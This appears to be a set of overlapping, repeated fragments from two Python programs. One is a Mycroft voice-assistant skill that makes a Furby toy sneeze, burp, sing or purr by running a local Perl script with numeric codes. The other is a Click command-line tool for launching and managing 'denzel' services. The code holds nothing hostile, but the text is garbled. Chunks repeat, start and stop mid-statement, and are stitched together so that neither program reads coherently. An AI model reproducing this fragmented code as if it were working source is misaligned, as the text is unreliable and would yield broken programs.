\"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze')", "\"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent')", "self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) 
self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing')", "\"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"])", "from mycroft import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent')", "\"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart')", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\",", "@intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", 
\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def", "self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\",", "mycroft import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def", "@intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def", "def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self,", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"])", "handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", 
\"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk')", "self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\",", "self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\",", "@intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"])", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) 
@intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"])", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "handle_furby_talk(self, 
message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message):", "def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def create_skill(): return", "self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\",", "__init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent')", "@intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", 
\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep')", "handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self,", "import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self,", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self,", "def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self,", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"])", "\"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) 
@intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\"," ]
[ "commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # --------", "updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def", "\"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target", "@cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs", "(sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or", "docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # --------", "from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs():", "using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES", "services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update", "default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response", "-------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status --------", "to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using", "logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell --------", "logs\"\"\" 
commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output',", "@click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) #", "pass --sync or --async') if sync and timeout <= 0: raise click.ClickException('Sync timeout", "and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False,", "logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker", "-------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live',", "-------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def", "def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown", "\"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must", "start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\"", "# -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status", "default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def", "@cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services", "--sync or --async') if sync and timeout <= 0: raise 
click.ClickException('Sync timeout must", "--async') if sync and timeout <= 0: raise click.ClickException('Sync timeout must be greater", "and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']),", "status view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) #", "view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # --------", "@cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs", "raise click.ClickException('Must pass --sync or --async') if sync and timeout <= 0: raise", "@cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout", "show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start --------", "commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5.,", "service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response", "pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA", "# -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart", "# -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def", "type=int, help=\"API endpoints port\", show_default=True) 
@click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def", "output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker", "start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command()", "\"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port',", ".. import commands from .. import config import click @click.group() def cli(): pass", "commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def", "# -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\"", "import click @click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str)", "startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def", "help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell", "None: raise click.ClickException('Must pass --sync or --async') if sync and timeout <= 0:", "deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\"", "help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) #", "log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True)", "-------- @cli.command() def 
restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live',", "@click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set", "def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs --------", "# -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live):", "def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live", "# -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live):", "def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs --------", "updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() #", "bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity')", "sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or --async') if", "-------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service", "shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops", "project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', 
default=config.API_PORT, type=int, help=\"API", "launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown --------", "timeout <= 0: raise click.ClickException('Sync timeout must be greater than 0') commands.response(sync, timeout)", "type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner", "the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT,", "help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and", "logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False,", "help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port,", "-------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs()", "['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live):", "use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True)", "GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) #", "help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\"", "-------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" 
commands.stop() # -------- restart --------", "@cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash", "services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() #", "commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and", "is None: raise click.ClickException('Must pass --sync or --async') if sync and timeout <=", "show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and", "monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command()", "services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() #", "updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\"", "show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker --------", "click @click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu',", "show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\"", "services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() #", "-------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', 
default=config.MONITOR_PORT,", "shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to", "help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # --------", "-------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() #", "# -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop", "\"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs():", "default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\"", "commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\"", "@click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\"", "\"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge',", "for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name,", "commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # --------", "commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def", "startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # 
-------- launch --------", "and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands", "services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker", "@click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services and", "updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs", "requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update", "@click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output',", "shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def", "-------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop --------", "@cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop():", "+ ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service,", "default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\"", "help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync,", "manner (sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync", "sync is None: raise click.ClickException('Must pass 
--sync or --async') if sync and timeout", "shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command()", "# -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float,", "starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard", "\"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs --------", "if sync and timeout <= 0: raise click.ClickException('Sync timeout must be greater than", "port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds", "commands from .. import config import click @click.group() def cli(): pass # --------", "-------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and", "from .. 
import config import click @click.group() def cli(): pass # -------- startproject", "timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or --async') if sync", "of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run", "# -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs()", "# -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on", "shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async',", "service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service", "status of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs():", "# -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service):", "-------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\"", "@click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds", "# -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA 